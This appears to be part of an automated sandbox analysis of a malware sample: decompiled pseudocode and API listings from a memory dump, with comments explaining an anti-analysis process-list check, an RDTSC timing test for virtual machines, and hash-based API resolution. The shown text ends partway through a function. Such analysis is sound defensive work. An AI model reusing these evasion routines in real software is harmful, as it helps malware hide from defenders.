                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E004182EA(void* __edx, void* __esi, void* __eflags, void* _a4) {
                                                                        				intOrPtr _v0;
                                                                        				void* _t9;
                                                                        				void* _t10;
                                                                        
                                                                        				if(__eflags < 0) {
                                                                        					_t10 = _t9 + 0xb0;
                                                                        					if (_t10 == 0) goto L5;
                                                                        				} else {
                                                                        					__ebp = __esp;
                                                                        					__eax = _v0;
                                                                        					_t6 = __eax + 0x10; // 0x300
                                                                        					_push(__esi);
                                                                        					_t7 = __eax + 0xc50; // 0x409743
                                                                        					__esi = _t7;
                                                                        					__eax = E00418DC0(__edi, _v0, __esi,  *_t6, 0, 0x2c);
                                                                        					__edx = _a4;
                                                                        					 *__esi = NtClose(_a4);
                                                                        					asm("rcr byte [esi+0x5d], 1");
                                                                        					return _t10;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: ce7febc0e0f999cbe590c3e8f2e4f3f9faa0a8ced1aefdb6e62ccb90fdfb4a61
                                                                        • Instruction ID: 46fd17f8ea7b8739283a53de088cfe90328876dba864404b12c831929fb87a91
                                                                        • Opcode Fuzzy Hash: ce7febc0e0f999cbe590c3e8f2e4f3f9faa0a8ced1aefdb6e62ccb90fdfb4a61
                                                                        • Instruction Fuzzy Hash: 21F04F712002147BD714EF99DC89ED777A8EF49750F15849DFA1C5B292DA34E90086E4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004181BA(void* __ecx, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                        				void* _v326412976;
                                                                        				long _t22;
                                                                        				void* _t36;
                                                                        
                                                                        				_t16 = _a4;
                                                                        				_t4 = _t16 + 0xc40; // 0xc40
                                                                        				E00418DC0(_t36, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                        				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                        				return _t22;
                                                                        			}

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: f9c86d653952326fbb6359b8eabd820d8c154286c6d240fdb1bd1733d4172ae0
                                                                        • Instruction ID: d8b7b186e317e85db12af468f5bb3ef09c84c760bff965db9117585e58897c97
                                                                        • Opcode Fuzzy Hash: f9c86d653952326fbb6359b8eabd820d8c154286c6d240fdb1bd1733d4172ae0
                                                                        • Instruction Fuzzy Hash: A501B2B2201248AFDB48CF98DC94EEB77A9AF8C754F15824CFA0D97241C630EC51CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                        				long _t21;
                                                                        				void* _t31;
                                                                        
                                                                        				_t3 = _a4 + 0xc40; // 0xc40
                                                                        				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                        				return _t21;
                                                                        			}

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E0041839B(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                        				long _t18;
                                                                        				void* _t25;
                                                                        
                                                                        				asm("les eax, [esi]");
                                                                        				asm("aam 0x55");
                                                                        				_t14 = _a4;
                                                                        				_t4 = _t14 + 0xc60; // 0xca0
                                                                        				E00418DC0(_t25, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                        				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                        				return _t18;
                                                                        			}

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 4329753037f38a6a7842ff8004b00154d6e16da1af9c554c650a8edbe8e8e001
                                                                        • Instruction ID: d7ed81dffac7f357383218509bbb4846abd72b672a40a630d302af3b1b4545dc
                                                                        • Opcode Fuzzy Hash: 4329753037f38a6a7842ff8004b00154d6e16da1af9c554c650a8edbe8e8e001
                                                                        • Instruction Fuzzy Hash: ACF0F8B2200218ABCB14DF89DC81EEB77A9EF88354F11865DFE5997241CA30E955CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                        				long _t14;
                                                                        				void* _t21;
                                                                        
                                                                        				_t3 = _a4 + 0xc60; // 0xca0, 0x004183af
                                                                        				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30); // 0x004183b7
                                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed, 0x004183d9
                                                                        				return _t14; // 0x004183dd
                                                                        			}

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E004182F0(void* __esi, intOrPtr _a4, void* _a8) {
                                                                        				long _t8;
                                                                        				void* _t11;
                                                                        
                                                                        				_t5 = _a4; // 0x004182f3
                                                                        				_t2 = _t5 + 0x10; // 0x300, 0x004182f6
                                                                        				_t3 = _t5 + 0xc50; // 0x409743, 0x004182ff
                                                                        				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c); // 0x00418307
                                                                        				_t8 = NtClose(_a8); // 0x00418315
                                                                        				asm("rcr byte [esi+0x5d], 1"); // 0x00418316
                                                                        				return _t8; // 0x00418319
                                                                        			}

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2b9a69f9e48666356d5c8a89237c0b42e467cd1ce66741125392214a6243cc9e
                                                                        • Instruction ID: df1dfbf18abbf79599b2a8d495042003c826c4a26089962c225452441f7bcd95
                                                                        • Opcode Fuzzy Hash: 2b9a69f9e48666356d5c8a89237c0b42e467cd1ce66741125392214a6243cc9e
                                                                        • Instruction Fuzzy Hash: E190027120154802E100A159481470B00459BD0742F55C011A1155559D8765885175B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f1076bcf835eb36e2946c858b703792cecd057a19b239cd410f4fd7a0ff9b56a
                                                                        • Instruction ID: 58cc64d4564b2b34f3427c3b78f8ad89de1506b48b715627c0e1fa4960b9e9c0
                                                                        • Opcode Fuzzy Hash: f1076bcf835eb36e2946c858b703792cecd057a19b239cd410f4fd7a0ff9b56a
                                                                        • Instruction Fuzzy Hash: 71900261601144425140B16988449064045BFE1651755C121A0989554D8699886566A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 896295af948e1a7cb93a1e4e4cee31b3d7d558df7fff128f088e8c7d4b39036f
                                                                        • Instruction ID: 954e8f3fc53bd5f337bab6af7f9df5f949e347937bed051a83c30bd9a0c24196
                                                                        • Opcode Fuzzy Hash: 896295af948e1a7cb93a1e4e4cee31b3d7d558df7fff128f088e8c7d4b39036f
                                                                        • Instruction Fuzzy Hash: EA90026121194442E200A5694C14B0700459BD0743F55C115A0145558CCA5588616561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: bd246fbe320d329a7731b67f6d56976ed19398e604c86d1b434fc7157fed2527
                                                                        • Instruction ID: d0d2fe332231c207f54f14432b57c18cf3d73b4f98376776d871c24281606a3a
                                                                        • Opcode Fuzzy Hash: bd246fbe320d329a7731b67f6d56976ed19398e604c86d1b434fc7157fed2527
                                                                        • Instruction Fuzzy Hash: 909002A134114842E100A1594414B060045DBE1741F55C015E1055558D8759CC527166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 550485f661ad95fce927bc9be8e76977fc40580c428964601ceec6980a25d92f
                                                                        • Instruction ID: de9a22a77899443d0dd4bacdab7b1b19b8c4e2db96d516b99fb38f1e2f64f2e7
                                                                        • Opcode Fuzzy Hash: 550485f661ad95fce927bc9be8e76977fc40580c428964601ceec6980a25d92f
                                                                        • Instruction Fuzzy Hash: 469002B120114802E140B159440474600459BD0741F55C011A5055558E87998DD576A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 81f29a786f09efb7dec7e0bedf50d999ac4cd717652715e81db888bf95a4125b
                                                                        • Instruction ID: 2b04f1c4a2b4a31892d6267c9b9eea7a7be7906c42f5abc577cf7b9a8f718c38
                                                                        • Opcode Fuzzy Hash: 81f29a786f09efb7dec7e0bedf50d999ac4cd717652715e81db888bf95a4125b
                                                                        • Instruction Fuzzy Hash: 0B90026160114902E101B1594404616004A9BD0681F95C022A1015559ECB658992B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 108e5999cb72c51347f741a2ed075506c8a99a524d0089bb09fbddb2237a85cb
                                                                        • Instruction ID: aabbc7597ad115f9c254325d8badfc3b3d47d539f28a704642f09a2e415ab475
                                                                        • Opcode Fuzzy Hash: 108e5999cb72c51347f741a2ed075506c8a99a524d0089bb09fbddb2237a85cb
                                                                        • Instruction Fuzzy Hash: 17900261242185526545F15944045074046ABE0681795C012A1405954C86669856E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c38bac9239372d2b784fab8732f9bc7c104f3ee66f53a3a70d1237daa174cd56
                                                                        • Instruction ID: d7cd1ece405de57903b9eafa6a59d1caf68cea3985ad6d65f9fa7fe5aacb9ebd
                                                                        • Opcode Fuzzy Hash: c38bac9239372d2b784fab8732f9bc7c104f3ee66f53a3a70d1237daa174cd56
                                                                        • Instruction Fuzzy Hash: 5690027120114813E111A159450470700499BD0681F95C412A041555CD97968952B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: cc6271b03d8ad80b25631ec13edb4a08447dff4ac30f6435697fff47a538312f
                                                                        • Instruction ID: f87f707fc0654558be31e257036e7efe298accf364c22154e994ef6b832f7915
                                                                        • Opcode Fuzzy Hash: cc6271b03d8ad80b25631ec13edb4a08447dff4ac30f6435697fff47a538312f
                                                                        • Instruction Fuzzy Hash: FC90026921314402E180B159540860A00459BD1642F95D415A000655CCCA5588696361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5fd18a9d784319b69038428239e6553f35f73c149f9135d8de3d6ac36f5f4bd3
                                                                        • Instruction ID: 27fac62de2bfca4fd270cbec5aea56af3f5653e4d707c3acb8f4d77bd58ec0ab
                                                                        • Opcode Fuzzy Hash: 5fd18a9d784319b69038428239e6553f35f73c149f9135d8de3d6ac36f5f4bd3
                                                                        • Instruction Fuzzy Hash: 8D90026130114403E140B15954186064045EBE1741F55D011E0405558CDA5588566262
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6de8a7ff27844657573202cfb2627657be06c15a4aa65a8b8733bfda5eefd061
                                                                        • Instruction ID: 27808fae12208f1908bb1e0872d71948964599b403fe82cf1451dcb722f4b7a9
                                                                        • Opcode Fuzzy Hash: 6de8a7ff27844657573202cfb2627657be06c15a4aa65a8b8733bfda5eefd061
                                                                        • Instruction Fuzzy Hash: 0F90027131128802E110A159840470600459BD1641F55C411A081555CD87D588917162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4aa71b909f89d8dc2ca723d7b3966ebda2cdfe1d544642460abdc1908c39fef5
                                                                        • Instruction ID: 9ce76c5d82073e2c712e34c37c8d6090ce11bf444379d7f3c96c2f45097abbf4
                                                                        • Opcode Fuzzy Hash: 4aa71b909f89d8dc2ca723d7b3966ebda2cdfe1d544642460abdc1908c39fef5
                                                                        • Instruction Fuzzy Hash: 6290027120114802E100A599540864600459BE0741F55D011A5015559EC7A588917171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 926122e3113fd023c0ee8e0b360102a68aa7dae0759a7a080d5d38be3c958647
                                                                        • Instruction ID: 931be5d828a8357e9ccdbdf6b3463a4096404718126acc9e531ea96807ba92d9
                                                                        • Opcode Fuzzy Hash: 926122e3113fd023c0ee8e0b360102a68aa7dae0759a7a080d5d38be3c958647
                                                                        • Instruction Fuzzy Hash: 3A9002712011CC02E110A159840474A00459BD0741F59C411A441565CD87D588917161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5d5d3a1436c7b7d85b7cf7289f690e86e0a25b93646228d54fe9129aa1c42ce1
                                                                        • Instruction ID: a6175ce5e299bfff449e1b2b36412b8a0c00d2f65f592a7747ea605bebbec5fa
                                                                        • Opcode Fuzzy Hash: 5d5d3a1436c7b7d85b7cf7289f690e86e0a25b93646228d54fe9129aa1c42ce1
                                                                        • Instruction Fuzzy Hash: E290027120114C02E180B159440464A00459BD1741F95C015A0016658DCB558A5977E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5977903262a4c37fdf5b4372e3810a479e8ad7f44687a7e54740b0468d32cc41
                                                                        • Instruction ID: db06db18557a0b40791da8f7596e22655dc19b74615beb2f19481fb9f9ff6655
                                                                        • Opcode Fuzzy Hash: 5977903262a4c37fdf5b4372e3810a479e8ad7f44687a7e54740b0468d32cc41
                                                                        • Instruction Fuzzy Hash: 2E9002A1202144035105B1594414616404A9BE0641B55C021E1005594DC66588917165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 0612a9c851b279d244f2324fb53cd543b8c568581c365f97c8d7a49b24771645
                                                                        • Instruction ID: 219c79d35a83652349e67c05d731618f677497924974fd29df6b406c27560ed3
                                                                        • Opcode Fuzzy Hash: 0612a9c851b279d244f2324fb53cd543b8c568581c365f97c8d7a49b24771645
                                                                        • Instruction Fuzzy Hash: 24900475311144031105F55D070450700C7DFD57D1355C031F1007554CD771CC717171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 93%
(In the C-Code listings on this page the instruction address is given at the left of each statement; 0x00000000 marks statements the decompiler emitted without an instruction of their own, such as break, continue and structural braces.)

            E004088B0(intOrPtr _a4) {
                intOrPtr _v8;
                char _v24;
                char _v284;
                char _v804;
                char _v840;
                void* _t24;
                void* _t31;
                void* _t33;
                void* _t34;
                void* _t39;
                void* _t50;
                intOrPtr _t52;
                void* _t53;
                void* _t54;
                void* _t55;
                void* _t56;

                // Stack layout note: _v840 up to _v284 spans 556 (0x22C) bytes and the name copied
                // below sits at +0x24 (_v804) inside it, which matches PROCESSENTRY32W (sizeof 0x22C,
                // szExeFile at +0x24). The report does not name the API, but the four calls on &_v24
                // (E00406E00 / E00407010 / E00407040 / E004070C0) read as open / first / next / close
                // of a snapshot walk that compares each entry's name against a fixed list.
0x004088bb      _t52 = _a4;
0x004088c3      _t39 = 0; // executed   -- match flag, set to 1 below when a list entry matches
0x004088c5      _t24 = E00406E00(_t52, &_v24); // executed
0x004088ca      _t54 = _t53 + 8;
0x004088cf      if(_t24 != 0) {
0x004088e2          E00407010(&_v24, &_v840);
0x004088e7          _t55 = _t54 + 8;
0x004088f0          do {
0x004088fc              E00419CD0(&_v284, 0x104);   // 0x104 = 260 = MAX_PATH: _v284 is the name buffer
0x0040890f              E0041A340(&_v284, &_v804);
0x00408914              _t56 = _t55 + 0x10;
0x00408917              _t50 = 0x4f;
0x00408920              while(1) {   // 20 list entries, indices 0x4f..0x62, fetched by E00413D70 and compared by E00413DD0
0x00408932                  _t31 = E00413DD0(E00413D70(_t52, _t50), &_v284);
0x00408937                  _t56 = _t56 + 0x10;
0x0040893c                  if(_t31 != 0) {
0x00000000                      break;   // first hit ends the inner loop
0x00000000                  }
0x0040893e                  _t50 = _t50 + 1;
0x00408942                  if(_t50 <= 0x62) {
0x00000000                      continue;
0x00000000                  } else {
0x00408944                  }
0x00000000                  goto L8;
0x00408942              }
0x00408946              _t9 = _t52 + 0x14; // 0xffffe1a5
0x00408949              *(_t52 + 0x474) = *(_t52 + 0x474) ^ *_t9;   // on a match: XOR a context field with the value at +0x14
0x0040894f              _t39 = 1;
0x00408951              L8:
0x0040895c              _t33 = E00407040(&_v24, &_v840);
0x00408961              _t55 = _t56 + 8;
0x00408964          } while (_t33 != 0 && _t39 == 0);   // stop at the first match or when entries run out
0x00408971          _t34 = E004070C0(_t52, &_v24); // executed
0x0040897c          if(_t39 == 0) {
0x0040897e              asm("rdtsc");   // two back-to-back RDTSC reads on the no-match path: this is the timing
0x00408984              asm("rdtsc");   // measurement the report flags as RDTSC-based virtualization detection
0x00408988              _v8 = _t34 - 0 + _t34;
0x0040898b              *((intOrPtr*)(_t52 + 0x55c)) = *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;   // 0xffffffba is -0x46 as a 32-bit value
0x0040898b          }
0x00408992          *((intOrPtr*)(_t52 + 0x31)) = *((intOrPtr*)(_t52 + 0x31)) + _t39;
0x00408995          _t20 = _t52 + 0x31; // 0x5608758b
0x0040899a          *((intOrPtr*)(_t52 + 0x32)) = *((intOrPtr*)(_t52 + 0x32)) + *_t20 + 1;
0x004089a7          return 1;
0x004088d6      } else {
0x004088d6          return _t24;
0x004088d6      }
            }

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                        • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                        • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                        • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitFreeHeapProcess
                                                                        • String ID:
                                                                        • API String ID: 1180424539-0
                                                                        • Opcode ID: 80a1839690273543de32ba5294452d1b84d5d79ead264455f8af8e5acdf43ab0
                                                                        • Instruction ID: 621f0a0e7606a0b5bbac690c6bf820d1e8e6f93a91c8788bd8a574082d101d7e
                                                                        • Opcode Fuzzy Hash: 80a1839690273543de32ba5294452d1b84d5d79ead264455f8af8e5acdf43ab0
                                                                        • Instruction Fuzzy Hash: F2F024B82842417FCB10CF799C40EEB7BA89F95358F05465DF84997243DA31DA16CAA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 82%
            E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                char _v67;
                char _v68;
                void* _t12;
                intOrPtr* _t13;
                int _t14;
                long _t21;
                intOrPtr* _t25;
                void* _t26;
                void* _t30;

0x00407260      _t30 = __eflags;
0x0040726f      _v68 = 0;
0x00407273      E00419D20(&_v67, 0, 0x3f);   // zero the 0x40-byte stack buffer that starts at _v68
0x0040727e      E0041A900(&_v68, 3);
0x0040728e      _t12 = E00409B20(_t30, _a4 + 0x1c, &_v68); // executed
                // The callee below is located through the 32-bit constant 0xc4e7b6d6 rather than by name and is
                // invoked indirectly (*_t25), which is why it does not appear in the APIs list for this function.
0x0040729e      _t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
0x004072a3      _t25 = _t13;
